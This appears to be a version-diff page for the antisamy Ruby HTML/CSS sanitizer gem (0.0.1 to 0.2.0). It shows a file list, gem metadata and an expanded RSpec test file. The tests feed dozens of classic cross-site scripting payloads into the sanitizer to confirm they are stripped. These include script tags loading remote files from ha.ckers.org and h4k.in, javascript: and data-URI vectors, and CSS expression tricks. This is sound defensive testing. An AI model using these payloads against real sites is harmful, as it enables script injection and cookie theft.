antisamy 0.0.1 → 0.2.0
Sign up to get free protection for your applications and to get access to all the features.
- data/README.rdoc +6 -1
- data/lib/antisamy/css/css_filter.rb +187 -0
- data/lib/antisamy/css/css_scanner.rb +84 -0
- data/lib/antisamy/css/css_validator.rb +129 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb +50 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/condition.rb +29 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb +23 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb +18 -0
- data/lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb +20 -0
- data/lib/antisamy/csspool/rsac/sac/conditions.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/document_handler.rb +66 -0
- data/lib/antisamy/csspool/rsac/sac/error_handler.rb +13 -0
- data/lib/antisamy/csspool/rsac/sac/generated_parser.rb +1012 -0
- data/lib/antisamy/csspool/rsac/sac/generated_property_parser.rb +9284 -0
- data/lib/antisamy/csspool/rsac/sac/lexeme.rb +27 -0
- data/lib/antisamy/csspool/rsac/sac/lexical_unit.rb +201 -0
- data/lib/antisamy/csspool/rsac/sac/parse_exception.rb +4 -0
- data/lib/antisamy/csspool/rsac/sac/parser.rb +109 -0
- data/lib/antisamy/csspool/rsac/sac/property_parser.rb +44 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb +45 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb +36 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/selector.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb +35 -0
- data/lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb +21 -0
- data/lib/antisamy/csspool/rsac/sac/selectors.rb +5 -0
- data/lib/antisamy/csspool/rsac/sac/token.rb +25 -0
- data/lib/antisamy/csspool/rsac/sac/tokenizer.rb +185 -0
- data/lib/antisamy/csspool/rsac/sac.rb +14 -0
- data/lib/antisamy/csspool/rsac/stylesheet/rule.rb +20 -0
- data/lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb +76 -0
- data/lib/antisamy/csspool/rsac/stylesheet.rb +3 -0
- data/lib/antisamy/csspool/rsac.rb +1 -0
- data/lib/antisamy/html/handler.rb +4 -0
- data/lib/antisamy/html/sax_filter.rb +49 -33
- data/lib/antisamy/html/scanner.rb +1 -43
- data/lib/antisamy/policy.rb +8 -3
- data/lib/antisamy/scan_results.rb +68 -0
- data/lib/antisamy.rb +4 -0
- data/spec/antisamy_spec.rb +111 -3
- metadata +39 -3
data/spec/antisamy_spec.rb
CHANGED
@@ -2,7 +2,9 @@ require File.expand_path(File.dirname(__FILE__) + '/spec_helper')
|
|
2
2
|
|
3
3
|
module AntiSamy
|
4
4
|
describe AntiSamy do
|
5
|
-
let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy.xml"}
|
5
|
+
let(:policy_file) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-testing.xml"}
|
6
|
+
let(:strict_policy) {"#{File.join(File.dirname(__FILE__), '..', 'policy-examples')}/antisamy-anythinggoes.xml"}
|
7
|
+
let(:policy_object) {AntiSamy.policy(policy_file)}
|
6
8
|
|
7
9
|
it "should load a policy" do
|
8
10
|
p = AntiSamy.policy(policy_file)
|
@@ -17,12 +19,118 @@ module AntiSamy
|
|
17
19
|
end
|
18
20
|
|
19
21
|
it "should tak our input and remove the script tags" do
|
20
|
-
input = "<p>Hi</p><script> some junk</script>"
|
22
|
+
input = "<p style='font-size: 16px'>Hi</p><script> some junk</script>"
|
21
23
|
expec = "<p>Hi</p>"
|
22
24
|
p = AntiSamy.policy(policy_file)
|
23
25
|
r = AntiSamy.scan(input,p)
|
24
26
|
r.clean_html.should == expec
|
27
|
+
r.messages.size.should == 2 # error 1 for script tag, error 2 for style tag
|
25
28
|
end
|
26
|
-
|
29
|
+
|
30
|
+
# Script attacks
|
31
|
+
{
|
32
|
+
"test<script>alert(document.cookie)</script>" => "script",
|
33
|
+
"<<<><<script src=http://fake-evil.ru/test.js>" => "<script",
|
34
|
+
"<script<script src=http://fake-evil.ru/test.js>>" => "<script",
|
35
|
+
"<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "<script",
|
36
|
+
'<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>' => "onload",
|
37
|
+
"<BODY ONLOAD=alert('XSS')>" => "alert",
|
38
|
+
"<iframe src=http://ha.ckers.org/scriptlet.html <" => "<iframe",
|
39
|
+
"<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">" => "src"
|
40
|
+
}.each_pair do |k,v|
|
41
|
+
it "should remove #{v} from #{k} for script attacks" do
|
42
|
+
r = AntiSamy.scan(k,policy_object)
|
43
|
+
r.clean_html.should_not include(v)
|
44
|
+
end
|
45
|
+
end
|
46
|
+
|
47
|
+
#Image Attacks
|
48
|
+
{
|
49
|
+
"<img src='http://www.myspace.com/img.gif'>"=>"<img",
|
50
|
+
"<img src=javascript:alert(document.cookie)>"=>"<img",
|
51
|
+
"<IMG SRC=javascript:alert('XSS')>"=>"<img",
|
52
|
+
"<IMG SRC=javascript:alert('XSS')>" => "&",
|
53
|
+
"<IMG SRC=javascript:alert('XSS')>"=>"&",
|
54
|
+
"<IMG SRC=\"jav
ascript:alert('XSS');\">" => "alert",
|
55
|
+
"<IMG SRC=\"javascript:alert('XSS')\"" => "javascript",
|
56
|
+
"<IMG LOWSRC=\"javascript:alert('XSS')\">"=>"javascript",
|
57
|
+
"<BGSOUND SRC=\"javascript:alert('XSS');\">"=>"javascript",
|
58
|
+
}.each_pair do |k,v|
|
59
|
+
it "should remove #{v} from #{k} for image attacks" do
|
60
|
+
r = AntiSamy.scan(k,policy_object)
|
61
|
+
r.clean_html.should_not include(v)
|
62
|
+
end
|
63
|
+
end
|
64
|
+
|
65
|
+
# Css attacks
|
66
|
+
{
|
67
|
+
"<div style=\"position:absolute\">" => "position",
|
68
|
+
"<style>b { position:absolute }</style>" => "position",
|
69
|
+
"<div style=\"z-index:25\">" => "z-index",
|
70
|
+
"<style>z-index:25</style>" => "z-index",
|
71
|
+
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family"
|
72
|
+
}.each_pair do |k,v|
|
73
|
+
it "should remove #{v} from #{k} for CSS attacks" do
|
74
|
+
r = AntiSamy.scan(k,policy_object)
|
75
|
+
r.clean_html.should_not include(v)
|
76
|
+
end
|
77
|
+
end
|
78
|
+
|
79
|
+
#href attacks
|
80
|
+
{
|
81
|
+
"<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">" => "href",
|
82
|
+
"<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">" => "href",
|
83
|
+
"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" => "ha.ckers",
|
84
|
+
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "ha.ckers",
|
85
|
+
"<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>" => "xss",
|
86
|
+
"<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS" => "javascript",
|
87
|
+
"<IMG SRC='vbscript:msgbox(\"XSS\")'>" => "vbscript",
|
88
|
+
"<a . href=\"http://www.test.com\">" => "href",
|
89
|
+
"<a - href=\"http://www.test.com\">" => "href",
|
90
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">" => "meta",
|
91
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">" => "meta",
|
92
|
+
"<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">" => "meta",
|
93
|
+
"<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>" => "iframe",
|
94
|
+
"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>" => "javascript",
|
95
|
+
"<TABLE BACKGROUND=\"javascript:alert('XSS')\">" => "background",
|
96
|
+
"<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">" => "background",
|
97
|
+
"<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">" => "javascript",
|
98
|
+
"<DIV STYLE=\"width: expression(alert('XSS'));\">" => "alert",
|
99
|
+
"<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">" => "alert",
|
100
|
+
"<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>" => "alert",
|
101
|
+
"<BASE HREF=\"javascript:alert('XSS');//\">" => "javascript",
|
102
|
+
"<BaSe hReF=\"http://arbitrary.com/\">" => "base",
|
103
|
+
"<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>" => "object",
|
104
|
+
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" => "object",
|
105
|
+
"<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
|
106
|
+
"<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>" => "embed",
|
107
|
+
"<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
108
|
+
"<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
109
|
+
"<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
110
|
+
"<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
111
|
+
"<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>" => "script",
|
112
|
+
"<SCRIPT SRC=http://ha.ckers.org/xss.js" => "script",
|
113
|
+
"<div/style=\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs\/xbl\/xbl\.xml\#xss)&>" => "style",
|
114
|
+
"<a href='aim: &c:\\windows\\system32\\calc.exe' ini='C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\pwnd.bat'>" => "calc.exe",
|
115
|
+
"<!--\n<A href=\n- --><a href=javascript:alert:document.domain>test-->" => "javascript",
|
116
|
+
"<a></a style=\"\"xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')\">" => "<a style=",
|
117
|
+
"<a onblur=\"alert(secret)\" href=\"http://www.google.com\">Google</a>" => "href",
|
118
|
+
"<b><i>Some Text</b></i>" => "<i />",
|
119
|
+
"<div style=\"font-family: Geneva, Arial, courier new, sans-serif\">" => "font-family",
|
120
|
+
"<style type=\"text/css\"><![CDATA[P { margin-bottom: 0.08in; } ]]></style>" => "margin"
|
121
|
+
|
122
|
+
}.each_pair do |k,v|
|
123
|
+
it "should remove #{v} from #{k} for href attacks" do
|
124
|
+
r = AntiSamy.scan(k,policy_object)
|
125
|
+
r.clean_html.should_not include(v)
|
126
|
+
end
|
127
|
+
end
|
128
|
+
|
129
|
+
it "shoud import some stylesheets" do
|
130
|
+
input = "<style>@import url(http://www.owasp.org/skins/monobook/main.css);@import url(http://www.w3schools.com/stdtheme.css);@import url(http://www.google.com/ig/f/t1wcX5O39cc/ig.css); </style>"
|
131
|
+
r = AntiSamy.scan(input,policy_object)
|
132
|
+
r.clean_html.should_not be_empty
|
133
|
+
end
|
134
|
+
|
27
135
|
end
|
28
136
|
end
|
metadata
CHANGED
@@ -2,7 +2,7 @@
|
|
2
2
|
name: antisamy
|
3
3
|
version: !ruby/object:Gem::Version
|
4
4
|
prerelease:
|
5
|
-
version: 0.0
|
5
|
+
version: 0.2.0
|
6
6
|
platform: ruby
|
7
7
|
authors:
|
8
8
|
- Sal Scotto
|
@@ -10,7 +10,7 @@ autorequire:
|
|
10
10
|
bindir: bin
|
11
11
|
cert_chain: []
|
12
12
|
|
13
|
-
date: 2011-03-
|
13
|
+
date: 2011-03-14 00:00:00 -04:00
|
14
14
|
default_executable:
|
15
15
|
dependencies:
|
16
16
|
- !ruby/object:Gem::Dependency
|
@@ -112,6 +112,42 @@ extra_rdoc_files:
|
|
112
112
|
- README.rdoc
|
113
113
|
files:
|
114
114
|
- lib/antisamy.rb
|
115
|
+
- lib/antisamy/css/css_filter.rb
|
116
|
+
- lib/antisamy/css/css_scanner.rb
|
117
|
+
- lib/antisamy/css/css_validator.rb
|
118
|
+
- lib/antisamy/csspool/rsac.rb
|
119
|
+
- lib/antisamy/csspool/rsac/sac.rb
|
120
|
+
- lib/antisamy/csspool/rsac/sac/conditions.rb
|
121
|
+
- lib/antisamy/csspool/rsac/sac/conditions/attribute_condition.rb
|
122
|
+
- lib/antisamy/csspool/rsac/sac/conditions/begin_hyphen_condition.rb
|
123
|
+
- lib/antisamy/csspool/rsac/sac/conditions/class_condition.rb
|
124
|
+
- lib/antisamy/csspool/rsac/sac/conditions/combinator_condition.rb
|
125
|
+
- lib/antisamy/csspool/rsac/sac/conditions/condition.rb
|
126
|
+
- lib/antisamy/csspool/rsac/sac/conditions/id_condition.rb
|
127
|
+
- lib/antisamy/csspool/rsac/sac/conditions/one_of_condition.rb
|
128
|
+
- lib/antisamy/csspool/rsac/sac/conditions/pseudo_class_condition.rb
|
129
|
+
- lib/antisamy/csspool/rsac/sac/document_handler.rb
|
130
|
+
- lib/antisamy/csspool/rsac/sac/error_handler.rb
|
131
|
+
- lib/antisamy/csspool/rsac/sac/generated_parser.rb
|
132
|
+
- lib/antisamy/csspool/rsac/sac/generated_property_parser.rb
|
133
|
+
- lib/antisamy/csspool/rsac/sac/lexeme.rb
|
134
|
+
- lib/antisamy/csspool/rsac/sac/lexical_unit.rb
|
135
|
+
- lib/antisamy/csspool/rsac/sac/parse_exception.rb
|
136
|
+
- lib/antisamy/csspool/rsac/sac/parser.rb
|
137
|
+
- lib/antisamy/csspool/rsac/sac/property_parser.rb
|
138
|
+
- lib/antisamy/csspool/rsac/sac/selectors.rb
|
139
|
+
- lib/antisamy/csspool/rsac/sac/selectors/child_selector.rb
|
140
|
+
- lib/antisamy/csspool/rsac/sac/selectors/conditional_selector.rb
|
141
|
+
- lib/antisamy/csspool/rsac/sac/selectors/descendant_selector.rb
|
142
|
+
- lib/antisamy/csspool/rsac/sac/selectors/element_selector.rb
|
143
|
+
- lib/antisamy/csspool/rsac/sac/selectors/selector.rb
|
144
|
+
- lib/antisamy/csspool/rsac/sac/selectors/sibling_selector.rb
|
145
|
+
- lib/antisamy/csspool/rsac/sac/selectors/simple_selector.rb
|
146
|
+
- lib/antisamy/csspool/rsac/sac/token.rb
|
147
|
+
- lib/antisamy/csspool/rsac/sac/tokenizer.rb
|
148
|
+
- lib/antisamy/csspool/rsac/stylesheet.rb
|
149
|
+
- lib/antisamy/csspool/rsac/stylesheet/rule.rb
|
150
|
+
- lib/antisamy/csspool/rsac/stylesheet/stylesheet.rb
|
115
151
|
- lib/antisamy/html/handler.rb
|
116
152
|
- lib/antisamy/html/sax_filter.rb
|
117
153
|
- lib/antisamy/html/scanner.rb
|
@@ -138,7 +174,7 @@ required_ruby_version: !ruby/object:Gem::Requirement
|
|
138
174
|
requirements:
|
139
175
|
- - ">="
|
140
176
|
- !ruby/object:Gem::Version
|
141
|
-
hash: -
|
177
|
+
hash: -3694882257398018241
|
142
178
|
segments:
|
143
179
|
- 0
|
144
180
|
version: "0"
|